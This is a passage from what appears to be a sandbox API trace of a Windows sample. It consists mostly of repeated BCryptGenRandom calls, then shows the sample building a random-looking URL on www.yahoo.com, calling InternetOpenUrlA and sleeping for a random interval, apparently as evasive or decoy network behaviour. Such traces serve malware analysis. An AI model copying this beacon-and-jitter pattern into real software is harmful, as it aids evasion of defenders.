pbBuffer=0x46ffd5d) returned 0x0 [0246.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1788f, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a1788f) returned 0x0 [0247.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.026] GetProcessHeap () returned 0x440000 [0247.026] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0247.026] lstrcpyA (in: lpString1=0x473770, lpString2="\x0bfò²s://www.yahoo.com" | out: lpString1="\x0bfò²s://www.yahoo.com") returned="\x0bfò²s://www.yahoo.com" [0247.026] lstrcatA (in: lpString1="\x0bfò²s://www.yahoo.com", lpString2="/5d3rnpqIfghOg6a54YlKrdgh1Pgr3B5x6/8vlGZ7D4pmxvwoosx2Mrjez5iqy7dUjtBbUex424qwc/6tleMbeeky9fVlgl9TP61dziBqvlw94yinkIh9L/" | out: lpString1="\x0bfò²s://www.yahoo.com/5d3rnpqIfghOg6a54YlKrdgh1Pgr3B5x6/8vlGZ7D4pmxvwoosx2Mrjez5iqy7dUjtBbUex424qwc/6tleMbeeky9fVlgl9TP61dziBqvlw94yinkIh9L/") returned="\x0bfò²s://www.yahoo.com/5d3rnpqIfghOg6a54YlKrdgh1Pgr3B5x6/8vlGZ7D4pmxvwoosx2Mrjez5iqy7dUjtBbUex424qwc/6tleMbeeky9fVlgl9TP61dziBqvlw94yinkIh9L/" [0247.027] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0247.027] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x0bfò²s://www.yahoo.com/5d3rnpqIfghOg6a54YlKrdgh1Pgr3B5x6/8vlGZ7D4pmxvwoosx2Mrjez5iqy7dUjtBbUex424qwc/6tleMbeeky9fVlgl9TP61dziBqvlw94yinkIh9L/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0247.027] GetProcessHeap () returned 0x440000 [0247.027] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0247.027] GetProcessHeap () returned 0x440000 [0247.027] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0247.027] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0247.027] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0247.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0247.028] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0247.028] Sleep (dwMilliseconds=0x169b2) [0247.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0247.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.145] GetProcessHeap () returned 0x440000 [0247.145] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0247.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0247.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0247.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e51, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5e51) returned 0x0 [0247.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 